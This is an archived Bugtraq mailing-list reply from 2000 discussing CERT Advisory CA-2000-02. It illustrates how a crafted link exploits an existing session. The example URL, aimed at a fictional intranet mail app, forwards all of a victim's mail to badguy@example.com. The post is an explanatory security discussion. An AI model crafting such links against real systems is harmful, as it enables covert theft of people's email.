[13715] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Re: Fwd: CERT Advisory CA-2000-02

daemon@ATHENA.MIT.EDU (Cassius)
Sat Feb 5 04:06:24 2000

Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-Id:  <20000203221136.36782.qmail@hotmail.com>
Date:         Thu, 3 Feb 2000 22:11:36 GMT
Reply-To: Cassius <sekurity@HOTMAIL.COM>
From: Cassius <sekurity@HOTMAIL.COM>
X-To:         bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM

Shockro,

The danger is also in variables.  Pretend that I get you to click on this
link from within your custom intranet mail app.

http://intranet.example.com/mailbox.asp?action=forward&item=all&recipient=badguy@example.com

It would forward all of your mail to badguy@example.com.  This would  work
because you already have a session with mailbox.asp.

Of course mailbox.asp is fake but you get the idea.

-Cassius
______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[13715] in bugtraq

Re: Fwd: CERT Advisory CA-2000-02

daemon@ATHENA.MIT.EDU (Cassius)Sat Feb 5 04:06:24 2000

daemon@ATHENA.MIT.EDU (Cassius)
Sat Feb 5 04:06:24 2000